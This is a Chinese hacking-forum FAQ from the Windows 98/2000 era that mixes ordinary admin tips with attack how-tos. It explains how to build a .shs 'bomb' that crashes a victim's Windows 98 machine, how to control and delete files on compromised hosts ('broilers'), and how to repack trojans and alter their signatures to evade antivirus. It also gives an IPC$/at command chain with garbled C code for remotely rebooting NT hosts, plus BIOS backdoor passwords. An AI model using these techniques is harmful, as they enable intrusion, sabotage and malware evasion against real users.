1)如何查看98的随机启动的程序?
在98下有一个实用配置程序(msconfig),中文名为:系统配置实用程序,调用的方法是在:开始——运行中输入msconfig,在里面,有一个启动的选项卡,点击后,可以看到很多随即启动程序,如果前面带有钩的话,就是启动时随机启动的,取消的话就是把前面的小钩去掉就可以了~(如果在这里查看到了一些未知的启动文件——比如没有文件的具体路径,或者没有文件名的话,最好取消它的自启动!因为很有可能是木马!)
除了这里以外,还有config.sys、autoexec.bat、system.ini、win.ini几个选项卡,他们分别对应这几个文件!只不过在这里更方便查看而已!
×××××××××××××××××××××××××××××××××××××××××××××
2)设置了BIOS密码,可是却忘记了,该怎么办?
如果是可以进入Windows的话,可以找找biospwds和cmospwd这两个软件看看~
还有利用DEBUG法:
简单介绍两种:
1)-o 70 16
-o 71 13
-q
2)-o 70 16
-o 71 16
-q
另一种方法:copy法:
copy con cmos.com
输入下面10个字符:alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格,然后按下F6并回车,退出,运行这个cmos.com程序就可以了~
恩,如果不能进入Windows怎么办呢?
简单介绍两种方法:
1)用通用密码:
Award Bios密码:j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589
AMI bios密码:AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.
这是常见的密码,不妨试试~
如果不行的话,可以利用CMOS放电:
就是把主板上的电池取下来,等一会儿再插上去~
×××××××××××××××××××××××××××××××××××××××××××××
3)如何自制一个让98蓝屏的炸弹?
恩,这个是前几天QQ上面朋友问我的问题,整理的时候突然间想起来了,就写一下好了~
首先,打开Word,再插入菜单中选择对象,这时,弹出对象包装程序窗口,再这个窗口中,点击导入,随便找一个文本或者程序就可以!之后点:编辑菜单。这里选择命令行,出现一个命令行窗口,在里面协商c:\con\con,点击保存,完成后,再点编辑包中的复制包,把他随便到一个地方复制下来,之后看到的是一个名位片断的东西!给这个文件起一个名字,呵呵,传给那个可怜的家伙吧,等待他蓝屏,掉线!
(这个命令行中可以插入很多的命令,不见得非要用这个98蓝屏漏洞哦~)顺便说一下:这个已经不是什么新鲜的技术了,这个技术的名字叫做:碎片对象。呵呵,碎片?记忆碎片么?不是的!他的后缀是:.shs!之所以说一下这个,是因为有的朋友还不知道~做一个整理而已!不知道的朋友看过后就知道了,知道的朋友就权当复习了~另外,不要利用这个方法做破坏!否则后果自负!
×××××××××××××××××××××××××××××××××××××××××××××
4)如何再命令行下杀死对方进程?
利用微软的2K以上操作系统都是含有这个工具的!该工具包含在2K光盘的\support\tools文件夹下!里面有安装程序,点击后,就安装了2K的support tools工具包,里面有kill这个工具,这时候再cmd下可以输入kill/?,就可以看到帮助了,使用这个命令的格式是:kill pid (pid是进程的ID号!)再任务管理器中可以看到进程的ID号!(不知道有几位朋友用过蓝色火焰?呵呵,用法跟这个一摸一样!还有很多类似的木马、后门软件都有类似的功能!这个是windows自带的大木马『后门工具』而已!)
这时候,有朋友问了,那再命令行下如何查看进程呢?呵呵,这就用到了系统自带的有一个后门工具了:再刚才说得那个目录中,还有一个工具叫tlist 看名字就能看出来是干什么的吧?用法更简单!直接输入tlist就可以得到pid遇队形程序的列表了~
那对方机器如果没有安装这两个程序怎么办呢?没关系,你把你操作系统盘符下面programfiles\support tools目录下面的这两个对应的exe文件上传到对方的winnt\system32目录中就可以了!呵呵~
×××××××××××××××××××××××××××××××××××××××××××××
5)上次说了ping的基本用法,这次谈谈ping的命令参数!
这个是本次问题集的重点部分!无论是小鸟还是老鸟,你们能保证你真的对这些参数了如指掌么?恐怕都未必!还是好好看看吧!
这是TCP/IP协议中最有用的命令之一
它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去)
-a Resolve addresses to hostnames.(把IP转为主机名)
-n count Number of echo requests to send.(响应请求的数量)
-l size Send buffer size.(封包的大小)
-f Set Don't Fragment flag in packet.(信息包中无碎片)
-i TTL Time To Live.(时间)
-v TOS Type Of Service.(服务类型)
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.(较严格的……唉,怎么译好……算了,放着吧)
-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)
比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。
其实这个命令主要是用来看对方应答的速度,如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。
×××××××××××××××××××××××××××××××××××××××××××××
6)如何查看本机的DNS服务器?
ipconfig其实是可以的(呵呵,上次就介绍过这个命令),除此以外,还可以利用一个命令:再cmd下输入netsh,进入到netsh>提示符,再输入:int ip 进入到interface ip> 然后再次输入dump,这时候屏幕上出现当前连接的配置情况了
这里必须介绍一下netsh到底是作什么用的!这个命令比较复杂,他包含了很多的子命令,所以这里只对部分命令进行讲解:
1)查看本机IP:首先键入netsh,再netsh>提示符下输入:interface 回车 之后:ip 回车 再之后:show address 回车 这样,就可以看到当前连接的IP地址和子网掩码。(其实这个命令不如ipconfig简单,也不如ipconfig/all全面)
2)修改网络配置:接着上面的命令,我们使用:set address name=“本地连接” source=static addr=192.168.0.200 mask=255.255.255.0,这样就修改了当前的IP地址,用show address来看看(或者用ipconfig)
3)显示一个完整的网络配置教本:
刚才说过,第一个命令显示的信息不如ipconfig/all全面,不用着急,netsh再打印显示网络配置上,还是有自己的特色的!例如:再interface ip>状态下输入:dump,会显示一个清单,显示所有本地连接(不管你是否使用~)与netstat -an不完全一样!
这就是netsh的简单介绍和最基础的用法!希望大家能够掌握!还可以输入?来查看帮助!(要在netsh>提示符下才能查看帮助啊~)
×××××××××××××××××××××××××××××××××××××××××××××
7)肉鸡上的部分文件无法删除,怎么办?
如果对方的文件夹是只读的话,会出现拒绝访问的字样!这时候,我们可以再del命令后面加上/f参数来删除!
×××××××××××××××××××××××××××××××××××××××××××××
8)再说一个可以限制用户登陆时间的命令!
再net命令中就可以实现这样的功能!具体方法如下:
假如我们打算让:coldcrysky这个用户再周日到周易的上午八点到下午四点之间可以登陆,用这个命令:
net user coldcrysky /times:sunday-monday,08:00-16:00
之后利用net user coldcrysky命令来查看登陆时间的限制,可以看到是我们所规定的时间(因为是中文的,很容易懂,我就不多废话了)
在此,特别提醒各位:命令中:星期日才是一周的开始!!!不要当成星期一!
光说了怎么设置,如果想恢复回去怎么办呢?(就是恢复成默认状态,任何时间都可以登陆的状态)
看我的:net user coldcrysky /time:all ——这样就可以了~
×××××××××××××××××××××××××××××××××××××××××××××
9)说道这里,我突然想起了一个关于脱壳和加壳的问题!
最近论坛中问这种问题的朋友又多了起来!曾经我回复过一个朋友,后来那个帖子也找不到了~
这里我在说一下!
其实脱壳和加壳并不是很困难!
先说说壳的作用吧!其实加壳的作用一共有2个目的!
1)可以压缩EXE格式的文件!使体积变小!
2)保护软件吧重要信息保护起来,防止别人更改!
脱壳和加壳分2种方法!
第一种方法:手动脱壳(加壳),呵呵,这个是比较麻烦的!恩,需要了解源代码什么的,还要知道不同的脱壳(加壳)软件的算法,才能成功脱壳(加壳),新学习脱壳(加壳)技术的朋友不推荐使用!
第二种方法是:自动脱壳(加壳)!通过使用软件,可以轻而易举的实现上面那个相对来说复杂一些的操作!对了,补充一下啊~!其实脱壳和加壳现在还有一个引申的作用!就是让杀毒软件不能识别出病毒!!!呵呵……这个一会儿再说!
主要使用的软件有:FileInfo、Language2000、TYP、PEiDentifier等(侦测软件!可以查看该文件用什么加壳软件加的壳!!!为脱壳起到至关重要的辅助作用!!!)
脱壳软件:AspackDie、UnAspack、UnPEPack等……(UPX也可以自己脱掉自己加的壳!)
加壳软件:UPX、ASPack……这两个特别流行!
恩,有的木马如果你用最新的杀毒软件查看,并不能查出是木马程序,但是如果你在开启病毒防火墙的情况下运行这个程序,则防火墙报警,说有木马或病毒什么的,询问如何处理,一般这种情况,就证明这个文件是通过脱壳、加壳后处理的木马了!小心啊,不要运行!!!其实不知道是谁说的脱壳、加壳处理木马?其实他再说的过程中似乎还省略了一些东西!再这个过程中,可以把木马做的更加个性化!更隐蔽,让杀毒软件更加无能为力!方法是:再脱壳后,用汇编软件(UltraEdit)打开那个木马!修改里面的标志性文字或者符号!再用eXeScope给木马换一个图标,之后再次加壳,这样,由于木马中的特征字符被更改了,导致以前能识别的木马现在杀毒软件更加不能识别出来了~比如:著名的冰河,在其服务端的源代码中有一段歌词,把歌词替换掉,呵呵……如果有的杀毒软件查找冰河的源代码时候仅仅检测的是这段歌词,以歌词作为冰河的特征的话,那这个杀毒软件可就……另外,前面说了,加壳的作用还有一个就是保护版权信息!可以把木马的版权信息(如制作人更改成你的名字,那么……呵呵)比较个性化吧~~~恩,当然,我写这个回帖的目的不是让大家都去练习脱壳、加壳,做木马,黑中国人!我的目的是让大家了解那些所谓能不被杀毒软件查杀的木马是怎么制作出来的,让大家更好的防范!
后面的是我后来补充的帖子内容:因为部分朋友看完我前面的回复后,仍然不明白~所以补充说明~
恩,检查壳的软件???我用Language2000+PEiDentifier来看!前者可以看这个软件用什么编写的,比如C++什么的,但是对于到底是什么加壳软件加壳,探测的效果不好……后者可以看这个软件用什么加的壳~本帖给加上了后者的软件!(大家如果需要,自己去找找看,实在找不到,可以跟我联系!)恩,下面我在重复一遍我上一个帖子的东东啊!!!大家如果不仔细看上一个帖子,怎么能理解加壳的作用呢???
加壳的目的是让杀毒软件不能够识别加壳后的木马!!!这一点是不允许任何人有疑问的!!!恩~怎么说呢?如果大家都用UPX加壳(这里是假设),前面介绍过了,如果都用软件的话,由于这个是自动加壳的软件,所以加壳的效果没有任何好坏之分!!!一个不会用电脑的人或许加壳的水平和一个加壳高手(晕~有这种高手么?)的加壳水平一样!当然,前提是都用同一个软件加壳的话!不过真正的加壳高手是不会用加壳软件的!他们选择手动加壳!如果是手动加壳,那由于加壳的人的水平不一,导致壳的质量也不同!!!自动加壳不存在水平的问题!!!首先推荐使用UPX,简单到我都想自杀了~~~其次是ASPack,可以设定加壳后的文件保护!还可以设定使用限制(比如天数限制,次数限制……)
下面这个问题也是老生常谈了,前面的帖子说过的!木马脱壳后,经过编辑木马!可以吧木马编辑的更加个性!比如木马的制作人等资料……包括木马的图标!!!都做好以后,再次加壳,可以达到3个目的!!!1)保护木马,不被杀毒软件查杀!!!这点是相当实用的!2)保护木马不被别人更改!如果用UltraEdit等软件打开加壳后的木马,木马中的中文是乱码!!!用这个方法可以判断程序是否加壳!加壳的程序打开后中文显示的是乱码,未加壳的则是中文!!!3)也是最最最最最最最最重要的一点!前面说了一遍了,加壳后可以使EXE文件的尺寸大大减小!!!相信你不会吧一个1M多的木马传给别人或者捆绑到网页,捆绑到Flash,捆绑到程序里吧,那样做是十分不明智的!!!!!!!!!!!!!
关于加壳的问题就说这么多~似乎废话多了点!再次请求大家仔细看看我前面的帖子和这个帖子,如果看完后还有不明白的再提问!很多问题都重复了……
Steven-1985,你的问题我前面也说过:木马加壳的确可以躲避杀毒软件,从而不被查杀,不过,有一点需要注意!运行木马后,木马释放出来的程序、Dll文件是脱壳后的文件!(相当于解压缩后的文件),这些文件已经不受壳的保护了!!!用最新版的杀毒软件可以查杀掉的!
如果还有不明白的问题的话,还可以参考看一下:黑白专区的steven-1985的加壳与脱壳的帖子!
×××××××××××××××××××××××××××××××××××××××××××××
10)如何删除windows2K的默认贡献?
首先打开记事本,输入如下内容:
net share c$ /delete
net share d$ /delete
net share e$ /delete
net share f$ /delete
net share g$ /delete
net share ipc$ /delete
net share admin$ /delete
这里的c$、d$、e$……是代表默认共享的盘符~又几个就设置几个就可以了~
之后点击保存成批处理文件(后缀为:bat的文件!)!加入到启动组中就可以了~
×××××××××××××××××××××××××××××××××××××××××××××
11)139端口的又一用法
呵呵,写这个帖子的原因是因为我答应给一个朋友回复139端口的作用来着……先声明两点:1)不要利用本帖所提到的方法去搞恶意破坏!2)呵呵,可能许多人已经知道了139端口这个用法了~本文只想起到一个抛砖引玉的作用!
废话不多说了~开始:
如果你使用NT主机的话,那你可要注意了!
重启NT主机的方法如下:
1:Net use \\XXX.XXX.XXX.XXX\ipc$ "password" /user:"username"
建立一个IPC连接
2:net use H: \\XXX.XXX.XXX.XXX\C$
将对方的C盘映射为自己的h盘
3:copy c on h:\reboot.bat
Iisreset /reboot
CTRL+Z
在对方的C盘上生成一个能重启机器的文件
4:net time \\XXX.XXX.XXX.XXX
得到对方机器时间
5:at \\XXX.XXX.XXX.XXX 重启的时间 c:\reboot.bat
设定对方重启的时间!
6:at \\XXX.XXX.XXX.XXX
查看任务上面是否添加了这个任务
7:等对方重启好了~
上面的第三步是only for Win2K的,如果是Nt,就需要用意个指定的重启程序,我们可以自己编写一个reboot.exe来代替reboot.bat,代码如下:
#include "stdio.h"
#include "windows.h"
int main()
{
//定义重启的时候发送给所有用户的消息
LPSTR msg="Reboot Tool By LionHook\nhttp://www.xici.net";
//尝试用最简单的API函数重启
if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;
if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;
//因为上面的重启不成功,所以需要调整本进程的特权
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE;
//获取重启的特权 SE_SHUTDOWN_NAME
LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);
//判断是NT内核还是9X内核,选择用不同的方式
if(!GetVersion()& 0x80000000))
InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);
else if (!ExitWindowXXX(EWX_REBOOT,0))
if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))
return FALSE;
return TRUE;
对了,再次说明啊,别用本文提到的方法搞破坏,小心警察叔叔打PP~呵呵
×××××××××××××××××××××××××××××××××××××××××××××
12)利用批处理文件来建立一个记录3389登陆者信息的记录器
由于Terminal Service默认是没有日志记录的,只能依靠他的系统日志,但是系统日志只能记录一些大动作(开启或停止服务),那么,如何用批处理文件来编写一个将是3389端口的程序呢?很简单:
建立一个批处理文件:内容如下:
@echo off
date/t >> c:\3389log.txt
:TS3389
time/t >> c:\3389log.txt
netstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log.txt
goto :TS3389
之后保存!
如果有人用你的3389登陆你的机器,呵呵,在c盘下就有3389log.txt这个文件!记录了当天日志,还有连接时间……资料~开始反击~呵呵
×××××××××××××××××××××××××××××××××××××××××××××
|
